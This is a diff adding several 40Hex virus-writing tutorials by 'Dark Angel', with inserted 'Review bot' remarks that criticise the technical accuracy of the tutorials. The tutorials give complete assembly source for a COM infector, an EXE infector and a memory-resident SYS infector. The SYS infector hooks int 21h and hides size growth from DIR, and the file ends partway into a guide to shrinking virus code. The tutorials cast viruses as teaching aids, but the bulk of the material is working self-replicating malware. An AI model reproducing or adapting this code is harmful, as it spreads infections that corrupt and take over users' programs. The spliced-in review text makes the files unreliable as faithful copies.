@@ -0,0 +1,238 @@ + + + An Introduction to Nonoverwriting Virii + + By Dark Angel + + + It seems that there are quite a few virus writers out there who just sit at + home and churn out hacks of virii. Yay. Anybody with a disassembler and + some free time can churn out dozens of undetectable (unscannable) variants + of any given virus in an hour. Others have not progressed beyond the + overwriting virus, the type of virus with the most limited potential for + spreading. Still others have never written a virus before and would like + to learn. This article is designed as a simple introduction to all + interested to the world of nonoverwriting virii. All that is assumed is a + working knowledge of 80x86 assembly language. + + Only the infection of COM files will be treated in this article, since the + infection routine is, I think, easier to understand and certainly easier to + code than that of EXE files. But do not dispair! EXE infections will be + covered in the next issue of 40Hex. + + COM files are described by IBM and Microsoft as "memory image files." + Basically, when a COM file is run, the file is loaded as is into memory. + No translation or interpretation of any sort takes place. The following + steps occur when a COM file is run: + + 1) A PSP is built. + 2) The file is loaded directly above the PSP. + 3) The program is run starting from the beginning. + + The PSP is a 256 byte header storing such vital data as the command line + parametres used to call the program. The file is located starting at + offset 100h of the segment where the program is loaded. Due to the 64K + limit on segment length, COM files may only be a maximum of 64K-100h bytes + long, or 65280 bytes. If you infect a COM file, make sure the final size + is below this amount or the PSP will get corrupted. + + Since the beginning of the file is at offset 100h in the segment (this is + the reason for the org 100h at the start of assembly source for com files), + the initial IP is set to 100h. 
The key to understanding nonoverwriting COM + virii is to remember that once the program is loaded into memory, it can be + changed at will without affecting the actual file on disk. + + The strategy of an overwriting virus is to write the virus to the beginning + of the COM file. This, of course, utterly annihilates the original program. + This, of course, is lame. The nonoverwriting virus changes only the first + few bytes and tacks the virus onto the end of the executable. The new + bytes at the beginning of the file cause the program, once loaded, to jump + to the virus code. After the virus is done executing, the original first + few bytes are rewritten to the area starting at 100h and a jmp instruction + is executed to that location (100h). The infected program is none the + worse for the wear and will run without error. + + The trick is to find the correct bytes to add to the beginning of the file. + The most common method is to use a JMP instruction followed by a two byte + displacement. Since these three bytes replace three bytes of the original + program, it is important to save these bytes upon infection. The JMP is + encoded with a byte of 0e9h and the displacement is simply the old file + length minus three. + + To replace the old bytes, simply use code similar to the following: + mov di, 100h + mov si, offset saved_bytes + movsw + movsb + + And to return control to the original program, use the following: + mov di, 100h + jmp di + + or any equivalent statements. + + When writing nonoverwriting virii, it is important to understand that the + variables used in the code will not be in their original locations. Since + virii are added to the end of the file, you must take the filesize into + account when calculating offsets. 
The standard procedure is to use the + short combination of statements: + + call oldtrick + oldtrick: + pop bp ; bp = current IP + sub bp, offset oldtrick ; subtract from original offset + + After these statements have been executed, bp will hold the difference in + the new offsets of the variables from the original. To account for the + difference, make the following substitutions in the viral code: + + lea dx, [bp+offset variable] + instead of + mov dx, offset variable + + and + + mov dx, word ptr [bp+offset variable] + instead of + mov dx, word ptr variable + + Alternatively, if you want to save a few bytes and are willing to suffer + some headaches, leave out the sub bp, offset oldtrick and calculate all + offsets as per the procedure above EXCEPT you must now also subtract offset + oldtrick from each of the offsets. + + The following is a short nonoverwriting virus which will hopefully help in + your understanding of the techniques explained above. It's sort of cheesy, + since I designed it to be small and easily understandable. In addition to + being inefficient (in terms of size), it fails to preserve file date/time + and will not infect read-only files. However, it serves its purpose well + as a teaching aid. 
+ + --------Tear line---------------------------------------------------------- + + DumbVirus segment + Assume CS:DumbVirus + Org 100h ; account for PSP + + ; Dumb Virus - 40Hex demo virus + ; Assemble with TASM /m2 + + Start: db 0e9h ; jmp duh + dw 0 + + ; This is where the virus starts + duh: call next + next: pop bp ; bp holds current location + sub bp, offset next ; calculate net change + + ; Restore the original first three bytes + lea si, [bp+offset stuff] + mov di, 100h + ; Put 100h on the stack for the retn later + ; This will allow for the return to the beginning of the file + push di + movsw + movsb + + ; Change DTA from default (otherwise Findfirst/next will destroy + ; commandline parametres + lea dx, [bp+offset dta] + call set_dta + + mov ah, 4eh ; Find first + lea dx, [bp+masker] ; search for '*.COM',0 + xor cx, cx ; attribute mask - this is unnecessary + tryanother: + int 21h + jc quit ; Quit on error + + ; Open file for read/write + ; Note: This fails on read-only files + mov ax, 3D02h + lea dx, [bp+offset dta+30] ; File name is located in DTA + int 21h + xchg ax, bx + + ; Read in the first three bytes + mov ah, 3fh + lea dx, [bp+stuff] + mov cx, 3 + int 21h + + ; Check for previous infection + mov ax, word ptr [bp+dta+26] ; ax = filesize + mov cx, word ptr [bp+stuff+1] ; jmp location + add cx, eov - duh + 3 ; convert to filesize + cmp ax, cx ; if same, already infected + jz close ; so quit out of here + + ; Calculate the offset of the jmp + sub ax, 3 ; ax = filesize - 3 + mov word ptr [bp+writebuffer], ax + + ; Go to the beginning of the file + xor al, al + call f_ptr + + ; Write the three bytes + mov ah, 40h + mov cx, 3 + lea dx, [bp+e9] + int 21h + + ; Go to the end of the file + mov al, 2 + call f_ptr + + ; And write the rest of the virus + mov ah, 40h + mov cx, eov - duh + lea dx, [bp+duh] + int 21h + + close: + mov ah, 3eh + int 21h + + ; Try infecting another file + mov ah, 4fh ; Find next + jmp short tryanother + + ; Restore the DTA and 
return control to the original program + quit: mov dx, 80h ; Restore current DTA to + ; the default @ PSP:80h + set_dta: + mov ah, 1ah ; Set disk transfer address + int 21h + retn + f_ptr: mov ah, 42h + xor cx, cx + cwd ; equivalent to: xor dx, dx + int 21h + retn + + masker db '*.com',0 + ; Original three bytes of the infected file + ; Currently holds a INT 20h instruction and a null byte + stuff db 0cdh, 20h, 0 + e9 db 0e9h + eov equ $ ; End of the virus + ; The following variables are stored in the heap space (the area between + ; the stack and the code) and are not part of the virus that is written + ; to files. + writebuffer dw ? ; Scratch area holding the + ; JMP offset + dta db 42 dup (?) + DumbVirus ENDS + END Start + + --------------------------------------------------------------------------- + + Do not worry if not everything makes sense to you just yet. I tried to + keep the example virus as simple as possible, although, admittedly, the + explanations were a bit cryptic. It should all come to you in time. + + For a more complete discussion of nonoverwriting virii, pick up a copy of + each of the first three parts of my virus writing guide (the phunky, the + chunky, and the crunchy), where you may find a thorough tutorial on + nonresident virii suitable for any beginning virus programmer. diff --git a/textfiles.com/virus/datut003.txt b/textfiles.com/virus/datut003.txt new file mode 100644 index 00000000..e019b1bb --- /dev/null +++ b/textfiles.com/virus/datut003.txt 
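Review bot: the caveat list above the DumbVirus listing in datut002.txt (does not preserve date/time, does not infect read-only files) omits the one limitation the text itself sets up earlier: the introduction says a COM file must stay below 64K-100h (65280) bytes or the PSP is corrupted, yet the only test before the write is the already-infected comparison on `word ptr [bp+dta+26]`, and no upper bound on file size is checked. For a teaching listing that is worth stating in the caveats, next to the other two. Also worth a comment: the return path depends on `push di` (100h) surviving until the `retn` in `set_dta` and on ES = CS and DF clear for the `movsw`/`movsb` restore, which is what a COM loader provides but is not said anywhere in the listing.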
@@ -0,0 +1,322 @@ + + + An Introduction to Nonoverwriting Virii + Part II: EXE Infectors + + By Dark Angel + + + In the last issue of 40Hex, I presented theory and code for the + nonoverwriting COM infector, the simplest of all parasitic virii. + Hopefully, having learned COM infections cold, you are now ready for EXE + infections. There is a grey veil covering the technique of EXE infections, + as the majority of virii are COM-only. + + EXE infections are, in some respects, simpler than COM viruses. + However, to understand the infection, you must understand the structure of + EXE files (naturally). EXE files are structured into segments which are + loaded consecutively atop one another. Thus, all an EXE infector must do + is create its own segment in the EXE file and alter the entry point + appropriately. Therefore, EXE infections do not require restoration of + bytes of code, but rather involve the manipulation of the header which + appears in the beginning every EXE file and the appending of viral code to + the infected file. The format of the header follows: + + Offset Description + 00 ID word, either 'MZ' or 'ZM' + 02 Number of bytes in the last (512 byte) page in the image + 04 Total number of 512 byte pages in the file + 06 Number of entries in the segment table + 08 Size of the header in (16 byte) paragraphs + 0A Minimum memory required in paragraphs + 0C Maximum memory requested in paragraphs + 0E Initial offset in paragraphs to stack segment from header + 10 Initial offset in bytes of stack pointer from stack segment + 12 Negative checksum (ignored) + 14 Initial offset in bytes of instruction pointer from code segment + 16 Initial offset in paragraphs of code segment from header + 18 Offset of relocation table from start of file + 1A Overlay number (ignored) + + The ID word is generally 'ZM' (in the Intel little-endian format). Few + files start with the alternate form, 'MZ' (once again in Intel little- + endian format). 
To save space, a check for the alternate form of the EXE + ID in the virus may be omitted, although a few files may be corrupted due + to this omission. + + The words at offsets 2 and 4 are related. The word at offset 4 contains + the filesize in pages. A page is a 512 byte chunk of memory, just as a + word is a two byte chunk of memory. This number is rounded up, so a file + of length 514 bytes would contain a 2 at offset 4 in the EXE header. The + word at offset 2 is the image length modulo 512. The image length does not + include the header length. This is one of the bizarre quirks of the EXE + header. Since the header length is usually a multiple of 512 anyway, this + quirk usually does not matter. If the word at offset 2 is equal to four, + then it is generally ignored (heck, it's never really used anyway) since + pre-1.10 versions of the Microsoft linker had a bug which caused the word + to always be equal to four. If you are bold, the virus can set this word + to 4. However, keep in mind that this was a bug of the linker and not all + command interpreters may recognise this quirk. + + The minimum memory required by the program (offset A) can be ignored by the + virus, as the maximum memory is generally allocated to the program by the + operating system. However, once again, ignoring this area of the header + MAY cause an unsucessful infection. Simply adding the virus size in + paragraphs to this value can nullify the problem. + + The words representing the initial stack segment and pointer are reversed + (not in little-endian format). In other words, an LES to this location + will yield the stack pointer in ES and the stack segment in another + register. The initial SS:SP is calculated with the base address of + 0000:0000 being at the end of the header. + + Similarly, the initial CS:IP (in little-endian format) is calculated with + the base address of 0000:0000 at the end of the header. 
For example, if + the program entry point appears directly after the header, then the CS:IP + would be 0000:0000. When the program is loaded, the PSP+10 is added to the + segment value (the extra 10 accounts for the 100h bytes of the PSP). + + All the relevant portions of the EXE header have been covered. So what + should be done to write a nonoverwriting EXE infector? First, the virus + must be appended to the end of the file. Second, the initial CS:IP must be + saved and subsequently changed in the header. Third, the initial SS:SP + should also be saved and changed. This is to avoid any possible memory + conflicts from the stack overwriting viral code. Fourth, the file size + area of the header should be modified to correctly reflect the new size of + the file. Fifth, any additional safety modifications such as increasing + the minimum memory allocation should be made. Last, the header should be + written to the infected file. + + There are several good areas for ID bytes in the EXE header. The first is + in the stack pointer field. Since it should be changed anyway, changing it + to a predictable number would add nothing to the code length. Make sure, + however, to make the stack pointer high enough to prevent code overwrites. + Another common area for ID bytes is in the negative checksum field. Since + it is an unused field, altering it won't affect the execution of any + programs. + + One further item should be mentioned before the code for the EXE infector. + It is important to remember that EXE files are loaded differently than COM + files. Although a PSP is still built, the initial CS does NOT point to it. + Instead, it points to wherever the entry point happens to be. DS and ES + point to the PSP, and therefore do NOT point to the entry point (your virus + code). It is important to restore DS and ES to their proper values before + returning control to the EXE. 
+ + ----cut here--------------------------------------------------------------- + + .model tiny ; Handy TASM directive + .code ; Virus code segment + org 100h ; COM file starting IP + ; Cheesy EXE infector + ; Written by Dark Angel of PHALCON/SKISM + ; For 40Hex Number 8 Volume 2 Issue 4 + id = 'DA' ; ID word for EXE infections + + startvirus: ; virus code starts here + call next ; calculate delta offset + next: pop bp ; bp = IP next + sub bp,offset next ; bp = delta offset + + push ds + push es + push cs ; DS = CS + pop ds + push cs ; ES = CS + pop es + lea si,[bp+jmpsave2] + lea di,[bp+jmpsave] + movsw + movsw + movsw + movsw + + mov ah,1Ah ; Set new DTA + lea dx,[bp+newDTA] ; new DTA @ DS:DX + int 21h + + lea dx,[bp+exe_mask] + mov ah,4eh ; find first file + mov cx,7 ; any attribute + findfirstnext: + int 21h ; DS:DX points to mask + jc done_infections ; No mo files found + + mov al,0h ; Open read only + call open + + mov ah,3fh ; Read file to buffer + lea dx,[bp+buffer] ; @ DS:DX + mov cx,1Ah ; 1Ah bytes + int 21h + + mov ah,3eh ; Close file + int 21h + + checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? + jnz infect_exe + find_next: + mov ah,4fh ; find next file + jmp short findfirstnext + done_infections: + mov ah,1ah ; restore DTA to default + mov dx,80h ; DTA in PSP + pop es + pop ds ; DS->PSP + int 21h + mov ax,es ; AX = PSP segment + add ax,10h ; Adjust for PSP + add word ptr cs:[si+jmpsave+2],ax + add ax,word ptr cs:[si+stacksave+2] + cli ; Clear intrpts for stack manip. + mov sp,word ptr cs:[si+stacksave] + mov ss,ax + sti + db 0eah ; jmp ssss:oooo + jmpsave dd ? ; Original CS:IP + stacksave dd ? ; Original SS:SP + jmpsave2 dd 0fff00000h ; Needed for carrier file + stacksave2 dd ? 
+ + creator db '[MPC]',0,'Dark Angel of PHALCON/SKISM',0 + virusname db '[DemoEXE] for 40Hex',0 + + infect_exe: + les ax, dword ptr [bp+buffer+14h] ; Save old entry point + mov word ptr [bp+jmpsave2], ax + mov word ptr [bp+jmpsave2+2], es + + les ax, dword ptr [bp+buffer+0Eh] ; Save old stack + mov word ptr [bp+stacksave2], es + mov word ptr [bp+stacksave2+2], ax + + mov ax, word ptr [bp+buffer + 8] ; Get header size + mov cl, 4 ; convert to bytes + shl ax, cl + xchg ax, bx + + les ax, [bp+offset newDTA+26]; Get file size + mov dx, es ; to DX:AX + push ax + push dx + + sub ax, bx ; Subtract header size from + sbb dx, 0 ; file size + + mov cx, 10h ; Convert to segment:offset + div cx ; form + + mov word ptr [bp+buffer+14h], dx ; New entry point + mov word ptr [bp+buffer+16h], ax + + mov word ptr [bp+buffer+0Eh], ax ; and stack + mov word ptr [bp+buffer+10h], id + + pop dx ; get file length + pop ax + + add ax, heap-startvirus ; add virus size + adc dx, 0 + + mov cl, 9 ; 2**9 = 512 + push ax + shr ax, cl + ror dx, cl + stc + adc dx, ax ; filesize in pages + pop ax + and ah, 1 ; mod 512 + + mov word ptr [bp+buffer+4], dx ; new file size + mov word ptr [bp+buffer+2], ax + + push cs ; restore ES + pop es + + mov cx, 1ah + finishinfection: + push cx ; Save # bytes to write + xor cx,cx ; Clear attributes + call attributes ; Set file attributes + + mov al,2 + call open + + mov ah,40h ; Write to file + lea dx,[bp+buffer] ; Write from buffer + pop cx ; cx bytes + int 21h + + mov ax,4202h ; Move file pointer + xor cx,cx ; to end of file + cwd ; xor dx,dx + int 21h + + mov ah,40h ; Concatenate virus + lea dx,[bp+startvirus] + mov cx,heap-startvirus ; # bytes to write + int 21h + + mov ax,5701h ; Restore creation date/time + mov cx,word ptr [bp+newDTA+16h] ; time + mov dx,word ptr [bp+newDTA+18h] ; date + int 21h + + mov ah,3eh ; Close file + int 21h + + mov ch,0 + mov cl,byte ptr [bp+newDTA+15h] ; Restore original + call attributes ; attributes + + mo_infections: jmp find_next 
+ + open: + mov ah,3dh + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + xchg ax,bx + ret + + attributes: + mov ax,4301h ; Set attributes to cx + lea dx,[bp+newDTA+30] ; filename in DTA + int 21h + ret + + exe_mask db '*.exe',0 + heap: ; Variables not in code + newDTA db 42 dup (?) ; Temporary DTA + buffer db 1ah dup (?) ; read buffer + endheap: ; End of virus + + end startvirus + + ----cut here--------------------------------------------------------------- + + This is a simple EXE infector. It has limitations; for example, it does + not handle misnamed COM files. This can be remedied by a simple check: + + cmp [bp+buffer],'ZM' + jnz misnamed_COM + continueEXE: + + Take special notice of the done_infections and infect_exe procedures. They + handle all the relevant portions of the EXE infection. The restoration of + the EXE file simply consists of resetting the stack and a far jmp to the + original entry point. + + A final note on EXE infections: it is often helpful to "pad" EXE files to + the nearest segment. This accomplishes two things. First, the initial IP + is always 0, a fact which can be used to eliminate delta offset + calculations. Code space can be saved by replacing all those annoying + relative memory addressing statements ([bp+offset blip]) statements with + their absolute counterparts (blip). Second, recalculation of header info + can be handled in paragraphs, simplifying it tremendously. The code for + this is left as an exercise for the reader. + + This file is dedicated to the [XxXX] (Censored. -Ed.) programmers (who have + yet to figure out how to write EXE infectors). Hopefully, this text can + teach them (and everyone else) how to progress beyond simple COM and spawn- + ing EXE infectors. In the next issue of 40Hex, I will present the theory + and code for the next step of file infector - the coveted SYS file. diff --git a/textfiles.com/virus/datut004.txt b/textfiles.com/virus/datut004.txt new file mode 100644 index 00000000..17276242 
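Review bot: the prose on the EXE header contradicts the code that follows it. The text says the word at offset 2 is the image length modulo 512 and that the image length excludes the header, but the MZ fields at offsets 2 and 4 (bytes in last page, pages in file) describe the whole file including the header, and the infect_exe routine agrees with that: it computes "shr ax, cl / ror dx, cl" and "and ah, 1" from the total file length and never subtracts the header size it reads separately from offset 8. The comment "any attribute" on "mov cx,7" is also misleading: 7 adds read-only, hidden and system files to normal ones but excludes directories and volume labels. Note too that the constant marker word 'DA' written into the initial-SP field at offset 10h, which the routine relies on to recognise files it has already touched, is exactly the kind of fixed header value a scanner or integrity checker can key on.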
--- /dev/null +++ b/textfiles.com/virus/datut004.txt 
@@ -0,0 +1,452 @@ + + + An Introduction to Nonoverwriting Viruses + Part III: SYS Infectors + + By Dark Angel + + + The SYS file is the most overlooked executable file structure in DOS. + Viruses are quite capable of infecting SYS files, as DOS kindly allows for + such extensions to this file format. + + The SYS file is loaded beginning at offset 0 of a particular segment. + It consists of a header followed by code. SYS files may be chained + together after a simple modification in the header. This is the key to + infecting SYS files. + + There are two types of device drivers; block and character. Block + devices include floppy, hard, and virtual disks, i.e. any media which can + store data. Character devices include printers, modems, keyboard, and the + screen. The virus will generally be a character device, as it reduces + complexity. + + The header structure is straightforward: + + Offset Size Description + ------ ---- ----------- + 0h DWORD Pointer to next header + 4h WORD Attribute + 6h WORD Pointer to strategy routine + 8h WORD Pointer to interrupt routine + 0Ah QWORD Name of the device driver + + The pointer to the next device driver header appears at offset zero in the + header. This is a far pointer consisting of a segment:offset pair. If the + current device is the only device appearing in the SYS file, then this + pointer should be set to FFFF:FFFF. However, if there are two or more + device drivers contained in the file, then the offset field should be equal + to the absolute location of the next device in the file. The segment field + should remain FFFF. For example, if a second device driver occurs at + offset 300h of the file, then the DWORD at offset 0 would be FFFF:0300 The + second (and all other) device driver must contain a new header as well. + + The next field contains the attribute of the device driver. Bit 15 + determines the nature of the device driver. 
If bit 15 is set, then the + device driver header corresponds to a character device; otherwise, the + device is a block device. You need not concern yourself with any of the + other bits; they may remain cleared. + + Before the next two fields may be understood, it is necessary to introduce + the concept of the request header. The request header contains DOS's + requests of the device driver. For example, DOS may ask for initialisation + or a read or even a status check. The information needed by the device + driver to interpret the request is all contained in the request header. It + is passed to the strategy routine by DOS as a far pointer in ES:BX. The + job of the strategy routine is to save the pointer for use by the interrupt + routine. The interrupt routine is called by DOS immediately after the + strategy routine. This routine processes the request in the header and + performs the appropriate actions. + + The word-length pointers in the SYS header to the strategy and interrupt + routines are relative to the start of the SYS file. So, if the strategy + routine resides in absolute offset 32h in the file, then the field + containing the location of the strategy routine would hold the number 32h. + + The name field in the SYS header simply holds an 8 byte device name. For + example, 'NUL ' and 'CLOCK$ ' are two common DOS devices. The name + should be justified with space characters (0x20). + + By using DOS's feature of chaining SYS files, we may easily infect + this type of file. No bytes need to be saved. There are but two steps. + The first is to concatenate the virus to the target file. The second is to + alter the first word of the SYS file to point to the virus header. The + only trick involved is writing the SYS interrupt routine. 
The format of + the request header is: + + Offset Size Description + ------ ---- ----------- + 0h BYTE Length of request header (in bytes) + 1h BYTE Unit code (for block devices) + 2h BYTE Command code + 3h WORD Status + 5h QWORD Reserved by DOS + 0Dh Var. Data for the operation + + Only one command code is relevant for use in the virus. Upon + initialisation of the device driver, DOS will send a request header with 0 + in the command code field. This is the initialisation check. The format + of the variable sized field in the request header in this case is: + + Offset Size Description + ------ ---- ----------- + 0Dh BYTE Number of units (ignored by character devices) + 0Eh DWORD Ending address of resident program code + 12h DWORD Pointer to BPB aray (ignored by character devices) + 16h BYTE Drive number (irrelevant in character devices) + + The only relevant fields are at offset 3 and 0Eh. Offset 3 holds the + status word of the operation. The virus fills this in with the appropriate + value. Generally, the virus should put a value of 100h in the status word + in the event of a successful request and a 8103h in the status word in the + event of a failure. The 8103h causes DOS to think that the device driver + does not understand the request. A value of 8102h should be returned in + the event of a failed installation. Offset 0Eh will hold the address of + the end of the virus (include the heap!) in the event of a successful + installation and CS:0 in the event of a failure. + + Basically, the strategy routine of the virus should contain a simple + stub to save the es:bx pointer. The interrupt routine should fail all + requests other than initialisation. It should perform an installation if + the virus is not yet installed and fail if it is already in memory + (remember to set offset 0eh to cs:0). + + A sample infector with very limited stealth features follows. 
While it is + somewhat large, it may be easily coupled with a simple COM/EXE infection + routine to create a powerful virus. It is a SYS-only, memory resident + infector. + + --------------------------------------------------------------------------- + .model tiny + .code + org 0 ; SYS files originate at zero + ; SYS infector + ; Written by Dark Angel of Phalcon/Skism + ; for 40Hex + header: + + next_header dd -1 ; FFFF:FFFF + attribute dw 8000h ; character device + strategy dw offset _strategy + interrupt dw offset _interrupt + namevirus db 'SYS INF ' ; simple SYS infector + + endheader: + + author db 0,'Simple SYS infector',0Dh,0Ah + db 'Written by Dark Angel of Phalcon/Skism',0 + + _strategy: ; save es:bx pointer + push si + call next_strategy + next_strategy: + pop si + mov cs:[si+offset savebx-offset next_strategy],bx + mov cs:[si+offset savees-offset next_strategy],es + pop si + retf + + _interrupt: ; install virus in memory + push ds ; generally, only the segment + push es ; registers need to be preserved + + push cs + pop ds + + call next_interrupt + next_interrupt: + pop bp + les bx,cs:[bp+savebx-next_interrupt] ; get request header + pointer + + mov es:[bx+3],8103h ; default to fail request + cmp byte ptr es:[bx+2], 0 ; check if it is installation + request + jnz exit_interrupt ; exit if it is not + + mov es:[bx+10h],cs ; fill in ending address value + lea si,[bp+header-next_interrupt] + mov es:[bx+0eh],si + dec byte ptr es:[bx+3] ; and assume installation failure + + mov ax, 0b0fh ; installation check + int 21h + cmp cx, 0b0fh + jz exit_interrupt ; exit if already installed + + add es:[bx+0eh],offset endheap ; fixup ending address + mov es:[bx+3],100h ; and status word + + xor ax,ax + mov ds,ax ; ds->interrupt table + les bx,ds:[21h*4] ; get old interrupt handler + mov word ptr cs:[bp+oldint21-next_interrupt],bx + mov word ptr cs:[bp+oldint21+2-next_interrupt],es + + lea si,[bp+int21-next_interrupt] + cli + mov ds:[21h*4],si ; replace int 21h handler + 
mov ds:[21h*4+2],cs + sti + exit_interrupt: + pop es + pop ds + retf + + int21: + cmp ax,0b0fh ; installation check? + jnz notinstall + xchg cx,ax ; mark already installed + exitint21: + iret + notinstall: + pushf + db 9ah ; call far ptr This combined with + the + oldint21 dd ? ; pushf simulates an int 21h call + + pushf + + push bp + push ax + + mov bp, sp ; set up new stack frame + ; flags [bp+10] + ; CS:IP [bp+6] + ; flags new [bp+4] + ; bp [bp+2] + ; ax [bp] + mov ax, [bp+4] ; get flags + mov [bp+10], ax ; replace old flags with new + + pop ax ; restore the stack + pop bp + popf + + cmp ah, 11h ; trap FCB find first and + jz findfirstnext + cmp ah, 12h ; FCB find next calls only + jnz exitint21 + findfirstnext: + cmp al,0ffh ; successful findfirst/next? + jz exitint21 ; exit if not + + push bp + call next_int21 + next_int21: + pop bp + sub bp, offset next_int21 + + push ax ; save all registers + push bx + push cx + push dx + push ds + push es + push si + push di + + mov ah, 2fh ; ES:BX <- DTA + int 21h + + push es ; DS:BX->DTA + pop ds + + cmp byte ptr [bx], 0FFh ; extended FCB? + jnz regularFCB ; continue if not + add bx, 7 ; otherwise, convert to regular FCB + regularFCB: + mov cx, [bx+29] ; get file size + mov word ptr cs:[bp+filesize], cx + + push cs ; ES = CS + pop es + + cld + + ; The following code converts the FCB to an ASCIIZ string + lea di, [bp+filename] ; destination buffer + lea si, [bx+1] ; source buffer - filename + + cmp word ptr [si],'OC' ; do not infect CONFIG.SYS + jz bombout + + mov cx, 8 ; copy up to 8 bytes + back: cmp byte ptr ds:[si], ' ' ; is it a space? + jz copy_done ; if so, done copying + movsb ; otherwise, move character to + buffer + loop back + + copy_done: + mov al, '.' 
; copy period + stosb + + mov ax, 'YS' + lea si, [bx+9] ; source buffer - extension + cmp word ptr [si], ax ; check if it has the SYS + jnz bombout ; extension and exit if it + cmp byte ptr [si+2], al ; does not + jnz bombout + stosw ; copy 'SYS' to the buffer + stosb + + mov al, 0 ; copy null byte + stosb + + push ds + pop es ; es:bx -> DTA + + push cs + pop ds + + xchg di,bx ; es:di -> DTA + ; open file, read/only + call open ; al already 0 + jc bombout ; exit on error + + mov ah, 3fh ; read first + mov cx, 2 ; two bytes of + lea dx, [bp+buffer] ; the header + int 21h + + mov ah, 3eh ; close file + int 21h + + InfectSYS: + inc word ptr cs:[bp+buffer] ; if first word not FFFF + jz continueSYS ; assume already infected + ; this is a safe bet since + ; most SYS files do not have + ; another SYS file chained on + + alreadyinfected: + sub es:[di+29], heap - header ; hide file size increase + ; during a DIR command + ; This causes CHKDSK errors + ;sbb word ptr es:[di+31], 0 ; not needed because SYS files + ; are limited to 64K maximum + + bombout: + pop di + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + pop bp + iret + + continueSYS: + push ds + pop es + + lea si, [bp+offset header] + lea di, [bp+offset bigbuffer] + mov cx, offset endheader - offset header + rep movsb + + mov cx, cs:[bp+filesize] + add cx, offset _strategy - offset header ; calculate offset to + mov word ptr [bp+bigbuffer+6],cx ; strategy routine + + add cx, offset _interrupt - offset _strategy;calculate offset to + mov word ptr cs:[bp+bigbuffer+8], cx ; interrupt routine + + continueinfection: + mov ax, 4300h ; get file attributes + lea dx, [bp+filename] + int 21h + + push cx ; save attributes on stack + push dx ; save filename on stack + + mov ax, 4301h ; clear file attributes + xor cx, cx + lea dx,[bp+filename] + int 21h + + call openreadwrite + + mov ax, 5700h ; get file time/date + int 21h + push cx ; save them on stack + push dx + + mov ah, 40h ; write filesize to the old + mov 
cx, 2 ; SYS header + lea dx, [bp+filesize] + int 21h + + mov ax, 4202h ; go to end of file + xor cx, cx + cwd ; xor dx, dx + int 21h + + mov ah, 40h ; concatenate header + mov cx, offset endheader - offset header + lea dx, [bp+bigbuffer] + int 21h + + mov ah, 40h ; concatenate virus + mov cx, offset heap - offset endheader + lea dx, [bp+endheader] + int 21h + + mov ax, 5701h ; restore file time/date + pop dx + pop cx + int 21h + + mov ah, 3eh ; close file + int 21h + + mov ax, 4301h ; restore file attributes + pop cx + pop dx + int 21h + + jmp bombout + + openreadwrite: + mov al, 2 ; open read/write mode + open: mov ah, 3dh + lea dx,[bp+filename] + int 21h + xchg ax, bx ; put handle in bx + ret + + heap: + savebx dw ? + savees dw ? + buffer db 2 dup (?) + filename db 13 dup (?) + filesize dw ? + bigbuffer db offset endheader - offset header dup (?) + endheap: + + end header + --------------------------------------------------------------------------- + + The reason the "delta offset" is needed throughout the file is because + it is impossible to know the exact location where the SYS file will be + loaded into memory. This can be ameliorated by some file padding and fancy + mathematical calculations. + + The advantages of using SYS files are manyfold. There is no load high + routine involved apart from the strategy/interrupt routines. This saves + space. SYS files also generally load before TSR virus checkers. TSR + checkers also can't detect the residency routine of the virus, since it is + a normal part of the DOS loading process. The routine for the infection of + the SYS file is ridiculously easy to implement and takes remarkably little + space, so there is no reason not to include SYS support in viruses. + Finally, the memory "loss" reported by CHKDSK usually associated with + memory resident viruses is not a problem with SYS files. + + A SYS file infector, when combined with a COM and EXE general + infector, can lead to a powerful virus. 
Once the first SYS file is + infected, the infected system becomes extremely vulnerable to the virus, as + there is little the user can do to prevent the virus from running, short + of a clean boot. diff --git a/textfiles.com/virus/datut005.txt b/textfiles.com/virus/datut005.txt new file mode 100644 index 00000000..65795801 --- /dev/null +++ b/textfiles.com/virus/datut005.txt 
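Review bot: the closing claim that TSR virus checkers "can't detect the residency routine" is overstated by the code itself: the interrupt routine overwrites the int 21h vector ("mov ds:[21h*4],si" / "mov ds:[21h*4+2],cs"), which any tool that snapshots the interrupt table across CONFIG.SYS processing will see, and the comment beside the size-hiding in alreadyinfected admits the trick "causes CHKDSK errors", i.e. the size reported to DIR no longer matches the clusters actually allocated, which is the discrepancy integrity checkers look for. The commented-out "sbb word ptr es:[di+31], 0" is justified only by the assumption that a SYS file never exceeds 64K; that assumption belongs in the prose, not only in a code comment. Minor documentation fix: the init-request table spells "BPB aray".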
@@ -0,0 +1,184 @@ + + + CODE OPTIMISATION, A BEGINNER'S GUIDE + + Written by Dark Angel + + + When writing a virus, size is a primary concern. A bloated virus carrying + unnecessary baggage will run slower than its optimised counterpart and eat + up more disk space. + + Never optimise any code before it works fully, since altering code after + optimisation often messes up the optimisation and, in turn, messes up the + code. After it works, the focus can shift to optimisation. Always keep a + backup of the last working copy of the virus, as optimisation often leads + to improperly working code. With this in mind, a few techniques of + optimisation will be introduced. + + There are two types of optimisation: structural and local. Structural + optimisation occurs when shifting the position of code or rethinking and + reordering the functions of the virus shorten its length. A simple example + follows: + + check_install: + mov ax,1234h + int 21h + cmp bx,1234h + ret + + install_virus: + call check_install + jz exit_install + + If this is the only instance that the procedure check_install is called, + the following optimisation may be made: + + install_virus: + mov ax,1234h + int 21h + cmp bx,1234h + jz exit_install + + The first fragment wastes a total of 4 bytes - 3 for the call and 1 for the + ret. Four bytes may not seem to be worth the effort, but after many such + optimisations, the code size may be brought down significantly. The + reverse of this optimisation, using procedures in lieu of repetitive code + fragments, may work in other instances. Properly designed and well-thought + out code will allow for such an optimisation. 
Another structural + optimisation: + + get attributes + open file read/only + read file + close file + exit if already infected + clear attributes + open file read/write + get file time/date + write new header + move file pointer to end of file + concatenate virus + restore file time/date + close file + restore attributes + exit + + Change the above to: + + get attributes + clear attributes + open file read/write + read file + if infected, exit to close file + get file time/date + move file pointer to end of file + concatenate virus + move file pointer to beginning + write new header + restore file time/date + close file + restore attributes + exit + + By using the second, an open file and a close file are eliminated while + adding only one move file pointer request. This can save a healthy number + of bytes. + + Local, or peephole, optimisation is often easier to do than structural + optimisation. It consists of changing individual statements or short + groups of statements to save bytes. + + The easiest type of peephole optimisation is a simple replacement of one + line with a functional equivalent that takes fewer bytes. The 8086 + instruction set abounds with such possibilities. A few examples follow. + + Perhaps the most widespread optimisation, replace: + mov ax,0 ; this instruction is 3 bytes long + mov bp,0 ; mov reg, 0 with any reg = nonsegment register takes 3 bytes + with + xor ax,ax ; this takes but 2 